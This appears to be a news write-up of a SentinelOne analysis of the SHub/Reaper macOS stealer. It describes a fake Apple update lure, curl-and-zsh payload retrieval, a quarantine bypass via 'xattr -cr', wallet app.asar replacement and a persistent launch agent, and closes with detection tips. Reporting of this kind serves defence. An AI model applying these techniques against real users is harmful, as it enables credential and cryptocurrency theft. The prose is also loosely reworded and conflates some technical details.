A new version of the macOS data-stealing SHub has begun to impersonate official Apple security updates. The malware not only steals browser data and crypto wallets, but also installs a backdoor for permanent access to the system.
This process enables you to circumvent new security features (that apple has implemented) added into macos tahoe 26.4 as of late march. These are designed to stop “suspicious” terminal commands.
Sentinel One indicates that the victims visited fake versions of wechat and miro. These versions appeared authentic to some individuals with less experience. Domains found in the attack have included QQ-0732GWH22[.]com, MLROSOFT[.]CO[.]COM, and MLROWEB[.]COM.
Additionally, bleepingcomputer discovered another interesting feature: when the users clicked on either the windows or android download links they received the exact same dropbox executable file.
Prior to downloading the installer, the websites collect data regarding the target’s device. The scripting collects telemetry on the devices operating environment. It identifies whether a vpn or vm is present. Additionally, it looks at installed browser extensions for cryptocurrency wallets and password managers. Once all of the collected information is sent to the attacker via telegram-bot.
Afterward, the dynamic, created malicious applescript is embedded within an ascii-image. Upon clicking the run button, the system will display a fake notification for the apple xprotectremediator update. At this time, the malware will connect and retrieve a shell-script via curl. It then executes said script via zsh without any interaction.
Before activating it, Reaper searches for signs that you have configured your keyboard as russian or set russian as your preferred input language. When this happens, Reaper reports back to its C2 server “cis_blocked” and stops working at that point, without attempting to install itself on the computer.
Once Reaper has successfully identified your settings, it will launch the main component (osascript) and start collecting data. This is done by first prompting you to enter your macOS account password. Once you have entered your password, Reaper can then access your Keychain and other system secured data.
SHub starts stealing the following from your computer:
Browser data from Google Chrome, Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc and Orion browsers.
Crypto related extensions including MetaMask and Phantom.
Data from 1Password, Bitwarden and LastPass password vaults.
Desktop Crypto Wallets from Exodus, Atomic Wallet, Ledger Live, Electrum and Trezor Suite.
Your iCloud data.
Your Telegram session(s).
Developer configurations and files.
FileGrabber is an additional module in SHub that finds files in both the Documents and Desktop directories with financial or private information. In addition to being able to find all types of file, FileGrabber also limits each file size to 2MB. File sizes for png image type are limited to 6MB. Files cannot exceed a combined size of 150MB.
Once Reaper locates crypto wallet data, it will modify that wallet’s information by terminating the Application Process associated with that wallet (e.g., Coinbase Wallet) and then downloading a malicious version of “app.asar” from the Command & Control Server to overwrite the existing legitimate “app.asar”.
The malicious version of the App has been signed by SHUB using its own Code Signing Certificates in order to prevent GateKeeper warnings. This is achieved through clearing Quarantine Attributes via an xattr -cr command.
In addition to stealing information about users’ systems, Reaper establishes a launch agent, which will be able to mimic the function of a Google software update. When Reaper’s script executes (it does so every one minute), it sends the current operating system details to its management servers; in addition to sending details, Reaper’s script can retrieve any payloads that have been made available by the operator for execution with the permissions of the currently logged-in user.
The Sentinel One researchers are noting that SHub has evolved over time from being simply an info-stealer to a fully realized Remote Access Tool (RAT) and allow the operator to download additional malicious code onto the compromised machines.
Administrators should watch for unusual network communications once they know when Script Editor is launched, newly created Launch Agents and files mimicking legitimate services from reputable providers.
